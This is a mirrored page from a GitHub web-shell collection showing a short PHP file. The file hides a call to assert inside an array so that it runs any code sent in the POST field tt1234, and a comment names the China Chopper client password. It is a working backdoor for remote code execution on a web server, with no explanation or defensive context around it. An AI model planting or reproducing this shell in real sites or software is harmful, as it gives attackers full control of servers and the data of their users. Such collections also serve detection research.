mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
5 lines
No EOL
117 B
PHP
5 lines
No EOL
117 B
PHP
<?php
|
|
$item['tt'] = 'assert';
|
|
$array[] = $item;
|
|
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
|
|
?>
|